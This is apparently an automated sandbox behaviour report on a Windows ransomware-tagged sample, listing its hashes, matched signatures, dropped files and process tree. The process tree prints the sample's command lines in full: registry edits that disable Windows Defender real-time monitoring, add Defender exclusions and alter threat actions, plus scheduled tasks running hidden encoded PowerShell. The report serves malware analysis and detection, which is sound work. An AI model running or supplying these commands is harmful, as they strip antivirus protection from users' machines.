Analysis
max time kernel: 92s
max time network: 94s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 27-05-2024 05:49

Static task: static1
Behavioral task: behavioral1
Sample: 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
Resource: win7-20240221-en

General
Target: 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
Size: 6.6MB
MD5: 63f5795f3090d05b9165f4788e8cd0be
SHA1: e471234ef41fc7c15ee1213fb3b04f0b4bff05ba
SHA256: caedd9efb0758b3928fb4277c5a6a27e9989c6d3d03742adfdf83242fe29cb59
SHA512: f17d886adf196a79b7226d387e50497c6fd0cf0933bb885d7e2fd5bb448d131da95eb7724484aebfcb3a70cde0d2c68b7ead007a7f743d8cb3528856bda4b99a
SSDEEP: 196608:lNZIJez06oDGWsY2C7KelsLeElAFnWVlo4439VQeWx:lN6e6uPCVlsLfqFnF4IQn
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe

Windows security bypass
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\uxsKyVOxFpVdyluD = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HCtEkPSKU = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\uxsKyVOxFpVdyluD = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lOSXAGLcobUn = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GiPqhqLluuCEC = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\aSRIytoBnSqU2 = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hduqDfvYrAfrHLVB = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run PowerShell and hide display window.
Processes:
  pid | process
  1888 | powershell.exe
  1628 | powershell.EXE
  1684 | powershell.EXE
  2828 | powershell.exe
  1196 | powershell.EXE
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
Processes:
  description | ioc | process
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pookachmhghnpgjhebhilcidgdphdlhi\1.0.0.0\manifest.json | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\manifest.json | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
Drops file in System32 directory 9 IoCs
Processes:
  description | ioc | process
  File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Windows\system32\GroupPolicy\gpt.ini | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
Drops file in Program Files directory 13 IoCs
Processes:
  description | ioc | process
  File created | C:\Program Files (x86)\aSRIytoBnSqU2\bTPwoUwOwygKu.dll | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpi | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpi | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Program Files (x86)\aSRIytoBnSqU2\FpXhoUA.xml | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Program Files (x86)\lOSXAGLcobUn\nFVXxco.dll | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Program Files (x86)\HCtEkPSKU\TwUOyK.dll | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Program Files (x86)\HCtEkPSKU\zVkbFST.xml | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\yuHZwHb.xml | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Program Files (x86)\GiPqhqLluuCEC\ewzBFbS.dll | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Program Files (x86)\GiPqhqLluuCEC\tKphAJs.xml | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  File created | C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\znWnvKO.dll | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
Drops file in Windows directory 1 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\Tasks\kuRaZQzPzSEXqOG.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
Processes:
  pid | pid_target | process | target process
  2396 | 2780 | WerFault.exe | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid | process
  1856 | schtasks.exe
  632 | schtasks.exe
  3000 | schtasks.exe
  2784 | schtasks.exe
  320 | schtasks.exe
  2232 | schtasks.exe
  2812 | schtasks.exe
  2120 | schtasks.exe
  2068 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 36 IoCs
Processes:
  pid | process
  1888 | powershell.exe
  1888 | powershell.exe
  1888 | powershell.exe
  1628 | powershell.EXE
  1628 | powershell.EXE
  1628 | powershell.EXE
  1684 | powershell.EXE
  1684 | powershell.EXE
  1684 | powershell.EXE
  2828 | powershell.exe
  1196 | powershell.EXE
  1196 | powershell.EXE
  1196 | powershell.EXE
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1888 | powershell.exe
  Token: SeDebugPrivilege | 1628 | powershell.EXE
  Token: SeDebugPrivilege | 1684 | powershell.EXE
  Token: SeDebugPrivilege | 2828 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 1852 | WMIC.exe
  Token: SeSecurityPrivilege | 1852 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 1852 | WMIC.exe
  Token: SeLoadDriverPrivilege | 1852 | WMIC.exe
  Token: SeSystemProfilePrivilege | 1852 | WMIC.exe
  Token: SeSystemtimePrivilege | 1852 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 1852 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 1852 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 1852 | WMIC.exe
  Token: SeBackupPrivilege | 1852 | WMIC.exe
  Token: SeRestorePrivilege | 1852 | WMIC.exe
  Token: SeShutdownPrivilege | 1852 | WMIC.exe
  Token: SeDebugPrivilege | 1852 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 1852 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 1852 | WMIC.exe
  Token: SeUndockPrivilege | 1852 | WMIC.exe
  Token: SeManageVolumePrivilege | 1852 | WMIC.exe
  Token: 33 | 1852 | WMIC.exe
  Token: 34 | 1852 | WMIC.exe
  Token: 35 | 1852 | WMIC.exe
  Token: SeDebugPrivilege | 1196 | powershell.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description | pid | process | target process
  PID 2780 wrote to memory of 2424 | 2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe | cmd.exe
  PID 2780 wrote to memory of 2424 | 2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe | cmd.exe
  PID 2780 wrote to memory of 2424 | 2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe | cmd.exe
  PID 2780 wrote to memory of 2424 | 2780 | 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe | cmd.exe
  PID 2424 wrote to memory of 2440 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2440 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2440 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2440 | 2424 | cmd.exe | forfiles.exe
  PID 2440 wrote to memory of 2444 | 2440 | forfiles.exe | cmd.exe
  PID 2440 wrote to memory of 2444 | 2440 | forfiles.exe | cmd.exe
  PID 2440 wrote to memory of 2444 | 2440 | forfiles.exe | cmd.exe
  PID 2440 wrote to memory of 2444 | 2440 | forfiles.exe | cmd.exe
  PID 2444 wrote to memory of 2480 | 2444 | cmd.exe | reg.exe
  PID 2444 wrote to memory of 2480 | 2444 | cmd.exe | reg.exe
  PID 2444 wrote to memory of 2480 | 2444 | cmd.exe | reg.exe
  PID 2444 wrote to memory of 2480 | 2444 | cmd.exe | reg.exe
  PID 2424 wrote to memory of 2484 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2484 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2484 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2484 | 2424 | cmd.exe | forfiles.exe
  PID 2484 wrote to memory of 2540 | 2484 | forfiles.exe | cmd.exe
  PID 2484 wrote to memory of 2540 | 2484 | forfiles.exe | cmd.exe
  PID 2484 wrote to memory of 2540 | 2484 | forfiles.exe | cmd.exe
  PID 2484 wrote to memory of 2540 | 2484 | forfiles.exe | cmd.exe
  PID 2540 wrote to memory of 2544 | 2540 | cmd.exe | reg.exe
  PID 2540 wrote to memory of 2544 | 2540 | cmd.exe | reg.exe
  PID 2540 wrote to memory of 2544 | 2540 | cmd.exe | reg.exe
  PID 2540 wrote to memory of 2544 | 2540 | cmd.exe | reg.exe
  PID 2424 wrote to memory of 2556 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2556 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2556 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2556 | 2424 | cmd.exe | forfiles.exe
  PID 2556 wrote to memory of 2496 | 2556 | forfiles.exe | cmd.exe
  PID 2556 wrote to memory of 2496 | 2556 | forfiles.exe | cmd.exe
  PID 2556 wrote to memory of 2496 | 2556 | forfiles.exe | cmd.exe
  PID 2556 wrote to memory of 2496 | 2556 | forfiles.exe | cmd.exe
  PID 2496 wrote to memory of 2608 | 2496 | cmd.exe | reg.exe
  PID 2496 wrote to memory of 2608 | 2496 | cmd.exe | reg.exe
  PID 2496 wrote to memory of 2608 | 2496 | cmd.exe | reg.exe
  PID 2496 wrote to memory of 2608 | 2496 | cmd.exe | reg.exe
  PID 2424 wrote to memory of 2592 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2592 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2592 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2592 | 2424 | cmd.exe | forfiles.exe
  PID 2592 wrote to memory of 2604 | 2592 | forfiles.exe | cmd.exe
  PID 2592 wrote to memory of 2604 | 2592 | forfiles.exe | cmd.exe
  PID 2592 wrote to memory of 2604 | 2592 | forfiles.exe | cmd.exe
  PID 2592 wrote to memory of 2604 | 2592 | forfiles.exe | cmd.exe
  PID 2604 wrote to memory of 2560 | 2604 | cmd.exe | reg.exe
  PID 2604 wrote to memory of 2560 | 2604 | cmd.exe | reg.exe
  PID 2604 wrote to memory of 2560 | 2604 | cmd.exe | reg.exe
  PID 2604 wrote to memory of 2560 | 2604 | cmd.exe | reg.exe
  PID 2424 wrote to memory of 2432 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2432 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2432 | 2424 | cmd.exe | forfiles.exe
  PID 2424 wrote to memory of 2432 | 2424 | cmd.exe | forfiles.exe
  PID 2432 wrote to memory of 2528 | 2432 | forfiles.exe | cmd.exe
  PID 2432 wrote to memory of 2528 | 2432 | forfiles.exe | cmd.exe
  PID 2432 wrote to memory of 2528 | 2432 | forfiles.exe | cmd.exe
  PID 2432 wrote to memory of 2528 | 2432 | forfiles.exe | cmd.exe
  PID 2528 wrote to memory of 1888 | 2528 | cmd.exe | powershell.exe
  PID 2528 wrote to memory of 1888 | 2528 | cmd.exe | powershell.exe
  PID 2528 wrote to memory of 1888 | 2528 | cmd.exe | powershell.exe
  PID 2528 wrote to memory of 1888 | 2528 | cmd.exe | powershell.exe
Processes
(process tree; each entry gives the image path, then its command line, then the signatures matched on that process; indentation shows parent/child depth)

C:\Users\Admin\AppData\Local\Temp\2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
  "C:\Users\Admin\AppData\Local\Temp\2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe"
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        - Suspicious use of WriteProcessMemory

        \??\c:\windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

    C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        - Suspicious use of WriteProcessMemory

        \??\c:\windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

    C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        - Suspicious use of WriteProcessMemory

        \??\c:\windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

    C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        - Suspicious use of WriteProcessMemory

        \??\c:\windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

    C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell start-process -WindowStyle Hidden gpupdate.exe /force
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

          C:\Windows\SysWOW64\gpupdate.exe
            "C:\Windows\system32\gpupdate.exe" /force

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ggiEulQJn" /SC once /ST 03:17:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ggiEulQJn"

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ggiEulQJn"

  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

    C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      - Modifies Windows Defender Real-time Protection settings

  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

    C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      - Modifies Windows Defender Real-time Protection settings

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gGIDJBcfD" /SC once /ST 02:47:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gGIDJBcfD"

  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gGIDJBcfD"

  C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"

    C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        - Command and Scripting Interpreter: PowerShell
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        C:\Windows\SysWOW64\Wbem\WMIC.exe
          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
          - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:32

    C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

  C:\Windows\SysWOW64\cmd.exe
